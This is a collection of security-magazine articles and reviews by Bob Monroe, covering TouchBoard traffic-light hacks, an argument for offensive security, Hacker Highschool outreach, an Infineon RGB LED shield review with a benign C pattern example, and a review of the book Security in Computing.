We have the statistics to back those numbers up. When that speeding traffic is sensed and it is determined that it will not be able to safely stop at that red light, the first TouchBoard sensor is activated. This activation tells the traffic control box to turn all traffic lights red and keep them all red for three to four seconds. We don’t want any other traffic to move into the intersection, so all lights remain red. As the red-light runner enters the middle of the intersection, there is another IR and PID sensor attached to a camera that takes a lovely picture of the license plate, with the red glow of the light. That nice picture is sent via email to the local traffic enforcement agency, who will send that driver a wonderful letter in the mail along with a fine. That is the second sensor on the TouchBoard being activated. On the far end of the intersection, there is a third set of IR and PID sensors. These determine that the offending vehicle has left the danger area of the intersection. This trips the third TouchBoard sensor, which plays some jazz music and tells the traffic management system to reset and return to normal operations.

With a simple $10 TouchBoard, we’ve played some music, automated your house and saved a couple of lives. All by just doing some simple hacks. Please, the next time you are persuaded to think of hackers as criminals, remember that even hackers like Danish folk songs. Or something like that. Hack and don’t talk smack.

About the Author

Bob Monroe grew up in Southern California before he joined the U.S. Army in 1985. One of Bob’s first military assignments introduced him to the world of hacking. His prankster ways ended abruptly in 1996 when he was almost caught hacking by an eighty-two-year-old librarian. This incident led to a renewed interest in cyber security, as a good guy. Since then, he has written several articles for publication and maintains a passion for digital security.
Bob holds a Master of Science in Information Assurance from Norwich University. Bob’s specialty is cyber teaching and security awareness training. Along with work for the U.S. Army, he has taught security classes for the Veterans Administration, Military District of Washington, Commandant of the Marine Corps and staff, as well as countless others across the world. He holds a U.S. Patent for airport security automation technology that combines radar and thermal imaging to protect aircraft movement areas and the surrounding airspace. This patent does not impress the TSA folks at all and usually gives them a reason to strip search him instead. Bob works with the Institute for Security and Open Methodologies (ISECOM.org) and Hacker High School as an editor and writer. Both organizations are non-profit, with the mission of teaching computer security methods across a global audience. In his spare time, Bob makes children’s toys in his small woodshop. He still has all nine fingers, too. Oops, make that seven fingers.

Offended by Offensive Security
by Bob Monroe

The commonly held belief in the realm of digital security (cyber security for the new folks and media) is that the methods employed are strictly defensive in nature. Networks prepare for and wait for an attack, defend against the attack, respond as needed and maybe even report the attack to the authorities. If the attack was successful and not detected, the authorities contact the network in a reverse fashion. This process repeats itself thousands of times a day across the world. Rates of actual convictions for computer crimes range from 89% [1] for small countries to 5% for larger ones [2]. This does not reflect the actual number of people accused of committing such crimes, only the total number of people charged for such crimes that are convicted in a court.
IBM’s X-Force Threat Activity Exchange [3] shows current malicious activity across all monitored and reported IP addresses across the globe. At any given moment, there are hundreds of attacks represented on the exchange in a lovely colored chart of the world. There is nothing new to this information, just a different way to express it.

Defensive posturing is the art of fortifying assets with multiple types of protection. In the physical world, there are walls, barbed wire, security guards with vicious attack dogs, doors, walled doors with vicious attack dogs and so forth. The digital world has firewalls, intrusion detection systems, packet sniffers, access controls, and authentication methods, but sadly no vicious attack dogs. Networks combine these physical and digital products in a constant game of trying to protect their assets. We already know how well that is working out for them. Target, Sony, Coca-Cola, Starbucks and all the banks out there have been in the headlines for being attacked.

Law enforcement expects organizations and people to perform due diligence on protecting their assets. Leaving your valuable jewelry out in the open in public will be frowned upon by the police detective who has to write that theft report. Likewise, not changing the default password on a network switch or VMware server will also cause dismay from the shareholders as they pay out lawsuits for loss of data. Due diligence is much like the cave people huddled around a fire during the dark of night. They expect the fire (law enforcement) to protect them from the vicious attack of carnivores as they circle around the flames. As the evening wears on, the flames must be stoked and maintained, which means somebody has to go get more firewood. Those who go to get that firewood may not come back because they’ve ended up a meal for something else. This means the fire is limited in scope and resources. Law enforcement can only do so much with what they have.
As the animals see the fire wane, they approach closer and begin picking off one cave person at a time. If one of the animals catches fire, the cave people at least get a buffet for their efforts. This is little comfort since each night this same routine repeats itself. The fire is only a single tool and cannot be expected to protect everyone against all the hungry animals out there. We must look at another method.

Offensive security has had a bad reputation for many years. It is considered vigilantism by some. Others will say that you are taking the law into your own hands. There are political and legal issues with reprisal against the wrong parties, if you counterattack. The arguments are endless, yet nothing really seems to change the cyber security environment except more high-profile attacks. Argue all you want, changes only happen when someone is willing to make those changes. Paul Asadoorian and John Strand offered a solution at the 2012 RSA convention [4]. Their approach was to suggest three phases of annoyance, attribution and attack to ward off malicious intruders. The same tools that penetration testers use could be employed as offensive weapons, the presenters acknowledged. They also suggested tagging data and documents with web bugs to activate whenever that asset was used outside the intended environment. This is similar to the ink bombs used on department store merchandise that explode if the garment leaves the perimeter. This is also very much like the ink packets used in banks that stain money stolen during a heist. Is that offensive security or just good advice? Both.

There has never been a battle in the history of war won by waiting for the enemy to attack first. If you happen to wait for the enemy, then it is called an ambush and you have the upper hand due to the element of surprise and firepower. No military commander has ever told their troops to sit and wait for the enemy to strike first.
There is no tactical advantage to such a strategy, but security professionals are expected to do this exact same thing each and every day. We wait and then respond. We add more kindling to the fire, hoping we don’t get eaten next. It’s a little like watching a horror movie. You know that the victim shouldn’t go down into the basement alone, but they do anyway. Doesn’t the sound of a chain saw and screams give the victim the slightest hint that bad things are happening in the basement? But there they go, armed with a faulty flashlight and no cell phone signal, to their doom, over and over again.

Forgive the bluntness, but this is stupid. Defensive security is no way to go through life. We tell our kids not to be victims of bullies; we tell them to stand up to school thugs. We don’t practice what we preach, though. Even police departments in the U.S. have paid ransoms to get their data back from ransomware thieves. The fire itself has gotten burned. At what point are you going to stop playing the game where you don’t even know the rules?

Penetration testing is not the same as an attack. A penetration test has a scope with limitations and boundaries. An attack has a goal and no time limit. In order to conduct a proper security test, you must use the Open Source Security Testing Methodology Manual (OSSTMM). If you want to prove trust in your network, you have to have a scientific and mathematically proven method instead of just some cool software. Stop waiting for the bad man to go away. He isn’t going to leave. Start conducting proper security testing and become active in your role as a security professional. Grab the OSSTMM and start pursuing the animals eating all your friends. That fire is not getting any bigger.
[1] http://saitnews.co.za/e-government/cybercrime-conviction/
[2] http://www.oneindia.com/feature/conviction-rate-cyber-crime-is-0-5-per-cent-here-are-the-reasons-1609728.html
[3] https://exchange.xforce.ibmcloud.com/
[4] http://whatis.techtarget.com/definition/offensive-security

Shouting at the Security Waves
by Bob Monroe

At the RSA convention in April, I met a wonderful European gentleman named Knud. The ‘K’ is pronounced for this name.
Knud told me the story of a Viking king who was known for shouting at the waves. According to several documented accounts, this king would make it his mission to order the waves to cease at his command. The Viking lord was spotted many times standing on top of a cliff yelling at the waves below to stop. For what purpose, we will never know. We do know that the waves did not stop and have not stopped for any man beyond religious accounts. No mortal man has ever been able to command the ocean to bend to their will. But that would be a cool trick to witness. The biggest question here is why a noble man would even try to stop these forces of nature. Because he thought he could? Because he thought he had some magical power? Because he was trying to prove a point, maybe?

In digital security, we often find ourselves trying to shout at the waves as well. We go to training, attend classes, buy new software, add all sorts of cool gadgets, in hopes that we, too, can control the waves of security woes. This is not just an uphill battle; it’s a battle you can’t win with the way things are going now. No, this article isn’t about FUD. It’s about the reality of futility.

RSA had an estimated 35,000 attendees last week. Of those thousands, I only saw a few African Americans. I saw a small percentage of women make up the crowd. Except in one case, I did not see a single teenager. Why is that? The last time I looked, there was a significant part of our population that isn’t white and male. So why is digital security dominated by old white guys when the real world doesn’t look anything like that? Amit Yoran of RSA gave a talk about the need for a new map in the field of cyber security. How about we start by populating that map with a better representation of the real world? We can add some minorities to the workforce. We can increase the number of women in this profession. Maybe even give them equal pay for equal work. While Mr.
Yoran has you sitting in the dark [1] when it comes to security, we at the Institute for Security and Open Methodology have created a free teaching platform for teens. If we want a new shift in thinking, if we want the waves to actually stop, we need to come up with a new solution. At Hacker Highschool [2], we have a new solution and it’s called free education. There are all kinds of lessons for teens to download that will teach them about the digital security profession. These lessons are free to download and are translated into twenty-two languages. The lessons do not teach any particular product or vendor; we teach our students to think for themselves. The lessons do not endorse sitting in the dark, waiting for an opportunity. Instead we teach something called trust. Trust is established by implementing the ten operational security controls listed in the Open Source Security Testing Methodology Manual (OSSTMM). This is an unbiased evaluation of any device, network, or product down to the chip level. You, the evaluator, get to determine whether something is trustworthy or not. The vendor marketing terms and fancy words fall to the side when you use the free OSSTMM. This is what we are teaching at Hacker Highschool. We are teaching the next generation of digital security professionals to question every firewall, every protocol, every chip on every device and every means of communication to see if they are trustworthy. The OSSTMM uses a simple mathematical formula to remove any doubt that could add opinion over fact.

[1] http://www.rsaconference.com/blogs/rsas-amit-yoran-security-is-stumbling-around-in-the-dark?utm_source=inhouse&utm_medium=email&utm_campaign=april2015newsletter&spMailingID=22563241&spUserID=MTA3NDg3MTA1NjQ4S0&spJobID=543048202&spReportId=NTQzMDQ4MjAyS0
[2] Hackerhighschool.org

Our lessons at Hacker Highschool are being taught at a rate of 6 million downloads. Of those downloads, only 2% are from the U.S. Why is that?
Why is it that China understands the importance of teaching their youth about security but the U.S. does not? Europe and Asia also understand this critical shortfall, but America does not. We don't ask for your race, gender or financial background to download our free material. We just want you to learn. Hacker Highschool has the lessons, the teacher training material and the certifications backed by the Institute for Security and Open Methodologies (ISECOM.org). We want you to stop shouting at the waves and shine some light into the darkness. The new map belongs to our future and we need to start teaching them about the mistakes we already made. For those who are asking who I am, I'm an unpaid volunteer for Hacker Highschool, as all of us are. We believe in this cause but we need your help. Help us to help you. Teach the next generation of teens about our field. Shine some light onto their faces and watch them learn. A little knowledge goes a long way.

About the Author

Bob Monroe grew up in Southern California before he joined the U.S. Army in 1985. One of Bob's first military assignments introduced him to the world of hacking. His prankster ways ended abruptly in 1996 when he was almost caught hacking by an eighty-two year old librarian. This incident led to a renewed interest in cyber security, as a good guy. Since then, he has written several articles for publication and maintains a passion for digital security. Bob holds a Master of Science in Information Assurance from Norwich University. Bob's specialty is cyber teaching and security awareness training. Along with work for the U.S. Army, he has taught security classes for the Veterans Administration, Military District of Washington, Commandant of the Marine Corps and staff, as well as countless others across the world. He holds a U.S. Patent for airport security automation technology that combines radar and thermal imaging to protect aircraft movement areas and the surrounding airspace.
This patent does not impress the TSA folks at all and usually gives them a reason to strip search him instead. Bob works with the Institute for Security and Open Methodologies (ISECOM.org) and Hacker High School as an editor and writer. Both organizations are non-profit, with the mission of teaching computer security methods across a global audience. In his spare time, Bob makes children's toys in his small woodshop. He still has all nine fingers, too. Oops, make that seven fingers.

RGB LED Lighting Shield with XMC1202 for Arduino

Reviewed by Bob Monroe

This little board is powered by an ARM Cortex-M0 processor, which means it has programmable functions but sips power. Don't confuse the Cortex-M0 with Intel's Core M processors; this processor runs 32-bit code at 32 MHz. This isn't lightning fast; however, this board isn't designed as a graphics card. It's designed to be a programmable LED controller. To program the board and run it, you have to have an Arduino board, or you can use Infineon's own XMC1100 Boot Kit. The XMC1100 is native to the XMC1202, so they sit on top of each other. This is pretty much what all microcomputers do: they allow boards to stack on top of each other, connected via GPIO, serial or other direct methods. There is speed in doing this since the boards are physically attached and share input and output. Since the XMC1202 has its own programmable processor, that processor can add to the microcomputer's own computation power, almost like a GPU would. This frees up the main processor to focus on other tasks instead of having to compute the LED timing itself. Think of it as having your own personal assistant. That assistant can pick up duties you don't have time for, so it frees you up to do other things, like play with other add-on boards and write cool code. The board is screaming red in color. It almost hurts your eyes to look at it.
Infineon and a few other companies have been doing this flaming color thing for one reason or another. I guess it helps you find the board if you ever misplace it. I'm talking ultra-bright red. The type of red that usually signals danger. Luckily, the board isn't a danger, just really bright. I noticed quite a bit of empty space on the board; what I would consider to be wasted space because I like my boards to be packed with every sensor and gadget available. The XMC1202 does one thing but it does it well. It controls LEDs. This means you have an assortment of options with a programmable LED board. You are a little limited on the pin count, though, so make your connections count. If you are interested in controlling all of the lighting in your home or small office, this board is for you. If you want to set up a cool LED display that says what a great programmer you are, this is the board for you. The XMC1202 can control up to three different LED channels at a time. This means you can configure a string of red LEDs to flash, while a strand of blue LEDs pulses and your green LEDs orbit in a loop. There, you have a nice Halloween costume or a funky outfit for your dog. I was a little surprised by the heat put off by the board during my testing. The buildup isn't terrible but it would be something to take into consideration if your poor dog were wearing an outfit using this dev board. The LEDs don't really put off any heat but they did make my dog look at me really funny when they started to flash. He tried to bite them. It was funny to see his mouth light up as the LEDs pulsed. The XMC1202 has some of the pin-outs marked so you know what they do. It also helps that the red monster has connector holes to stack onto the other boards. There is about a ½ clearance that you will need to take into consideration where the wires are connected. I found this additional space useful to help move some of that excess heat away from the main board.
The spacers are plastic parts, so you don't need to worry about making extra sparks if the two boards touch. I've seen other add-on boards that seem to have forgotten that electricity likes to move through metal parts. It's always fun to see some sparks, but never from your own device or your dog. The XMC doesn't have any switches for power or reset. This isn't a big problem since you can program which conditions turn on the board and which ones shut it down. Remember that the LEDs will need their own power source. The board says it can provide the power at 5 V, but unless you plug in a power supply running at 1.5 A, get your own power for the LEDs. It's just easier that way. Unless you want to add on some capacitors: charge, zap; charge, zap. You get the idea.

I did run into another small problem: I don't have tiny hands. I know these are microcomputers. I know they are supposed to be small, but do they really have to make connectors that small? I had to use a magnifying glass just to insert the wire leads. A big magnifying glass and a big flashlight, even though the board puts off its own light with the red color. Luckily, the manufacturer understands that some of us have normal sized hands. For that, they made the wire connections with nice plastic screw tighteners. These little screws keep the LED wires from slipping out of the connector that I spent years (not really, more like a few seconds) trying to get in place. They hold the LEDs very securely, considering that they are plastic. I was surprised at how well the connections held the wires, especially since I'm not the most careful person I know. You don't even want to know what my lab looks like. Imagine Tokyo after Godzilla ate a ton of bean burritos. That's how badly my lab is organized, so stuff gets tangled up all the time. The Infineon RGB shield was able to survive my lab, my hands, my dog and my endless curiosity. This is a cool add-on board for Arduino projects.
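To make the three independent channel behaviours concrete (red flashing, blue pulsing, green looping), here is an added example of my own; it is not Infineon's library code and nothing on this page shows the shield's actual API. It is a host-side pattern generator in C that computes an 8-bit brightness for each of the three channels at every timer tick. The pattern names, the tick length, the periods and the idea of handing the result to a channel-setting call on the shield are all assumptions for illustration.

```c
/* Three-channel LED pattern generator (added example, not Infineon's code).
 * One brightness pattern per channel, evaluated per timer tick. */
#include <stdint.h>
#include <stdio.h>

#define NUM_CHANNELS 3        /* the shield drives three LED channels */
#define DUTY_MAX     255      /* 8-bit brightness: 0 = off, 255 = full */

typedef enum { PAT_FLASH, PAT_PULSE, PAT_ORBIT } pattern_t;

typedef struct {
    pattern_t pattern;
    uint32_t  period_ticks;   /* length of one cycle in timer ticks (assumed unit) */
} channel_cfg_t;

/* Brightness (0..255) of one channel at a given tick.
 * FLASH: hard on for the first half of the period, off for the second.
 * PULSE: triangle wave, fades up then back down.
 * ORBIT: sawtooth that ramps up and wraps, a continuous loop.
 * Periods below 2 ticks are clamped so the half-period never hits zero. */
uint8_t channel_duty(pattern_t pattern, uint32_t tick, uint32_t period)
{
    uint32_t pos, half, v;

    if (period < 2)
        period = 2;
    pos  = tick % period;
    half = period / 2;

    switch (pattern) {
    case PAT_FLASH:
        return pos < half ? DUTY_MAX : 0;
    case PAT_PULSE:
        v = pos < half ? pos * DUTY_MAX / half
                       : (period - pos) * DUTY_MAX / half;
        if (v > DUTY_MAX)     /* odd periods can overshoot by one step */
            v = DUTY_MAX;
        return (uint8_t)v;
    case PAT_ORBIT:
        return (uint8_t)(pos * DUTY_MAX / period);
    }
    return 0;
}

/* Fill duty[] with the brightness of every channel at this tick. */
void frame_duties(const channel_cfg_t cfg[NUM_CHANNELS], uint32_t tick,
                  uint8_t duty[NUM_CHANNELS])
{
    for (int ch = 0; ch < NUM_CHANNELS; ch++)
        duty[ch] = channel_duty(cfg[ch].pattern, tick, cfg[ch].period_ticks);
}

int main(void)
{
    /* red flashes, blue pulses, green orbits; periods are made-up values */
    const channel_cfg_t cfg[NUM_CHANNELS] = {
        { PAT_FLASH, 100 }, { PAT_PULSE, 200 }, { PAT_ORBIT, 150 }
    };
    uint8_t duty[NUM_CHANNELS];

    for (uint32_t tick = 0; tick < 300; tick += 50) {
        frame_duties(cfg, tick, duty);
        /* a real sketch would pass duty[] to the shield's channel-setting call here */
        printf("tick %3u  red %3u  blue %3u  green %3u\n",
               (unsigned)tick, duty[0], duty[1], duty[2]);
    }
    return 0;
}
```

Keeping the pattern maths on the host and sending only three brightness values per tick is what lets the shield's own processor do the dimming work, which is the division of labour the review describes.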
One thing I really wanted to hack was not using LEDs at all, but hooking up other low-power devices and using the board's signaling capabilities. If I can pulse, blink, and orbit LED lights, what is keeping me from using the same technique to control an IR light or a radio signal for a mini radar device? Nothing, just your imagination. That is the best part of hacking: you build whatever you want.

Security in Computing

by Charles P. Pfleeger, Shari Lawrence Pfleeger and Jonathan Margulies

Reviewed by Bob Monroe

I read and review about 30 books a year on average, plus spend most of my days researching and writing about digital security. I've been doing this routine since 1989, so I have a so-so understanding of cyber security. Security in Computing took me by surprise since it looked like the average security 101 book I read way too often. This book is nothing like any security book I've read before, except a few dissertation pieces I've picked up. The 910-page book is filled with heavy research and plenty of great real-world examples. One of the first things I noticed was that many of the references were from the 1960s, 70s, 80s and 90s. This tells me that the authors went back to old-school style and not just internet searches for content. If you do nothing else, get this book just for the bibliography. It is amazing because it is filled with old ideas that we still haven't learned in security. From a depth standpoint, this book should be mandatory reading for anyone after they obtain their CISSP. The Pfleegers and Margulies do a great job of presenting deeper understandings of security concepts along with pictures and examples from recent security failures. They stick to the basics of confidentiality, integrity and availability (CIA) but build off of those to show the reader how those concepts extend to a much wider field of study. This is not a classroom textbook; this is a manual on digital security with all the juicy stories that didn't make the headlines and all the original papers written before blogs existed. You will find exercises at the end of each chapter that are fairly well written, but it's kind of difficult to complete the exercises when your jaw is still on the floor. There is just too much great information on each page not to laugh (or cry) to yourself about how far we haven't come in this field.
Security in Computing is in its fifth edition, which just came out a few months into 2015. The ink is still wet, but I didn't see much updated information from the fourth edition. But then again, security hasn't fixed many mistakes in the two and a half decades I've been in it, so I figure there aren't many new catastrophes to talk about. Sony is still messing up; that hasn't changed. Passwords are still weak. Applications are still poorly written. Hardware has bugs at the firmware level. I'm hard pressed to think of anything new to add that isn't already covered in this huge book. I guess they could have talked about Hillary Clinton and her private email server or Target's data breach, but that would just remind us of other security errors from the past. One of my favorite parts of this book is how each topic is clearly explained but not dumbed-down. I'm not the brightest guy, but I do like the author to write at the appropriate level. The diagrams and pictures are helpful if you are really into flow charts. Some are even pretty funny. Across the board, there isn't a topic that wasn't covered in this book. Okay, there were some things that could have been added, but nothing that would make a big difference to this high-quality book. Just to give you an idea of how big the reference material is: there are 27 pages of bibliographic information at the back of the book, all written in fine print. I needed to wear two pairs of glasses to read some of those resources. If you are interested in learning a heck of a lot more about our history and future as security professionals, you'll need this book. You will not pass any certification, get any special initials after your last name, or even earn a promotion for reading this book. However, if you are passionate about this field, I highly suggest you buy this book and read it. Older folks will appreciate the nods to those who taught us.
Younger readers will appreciate where we came from before security vendors took over this profession.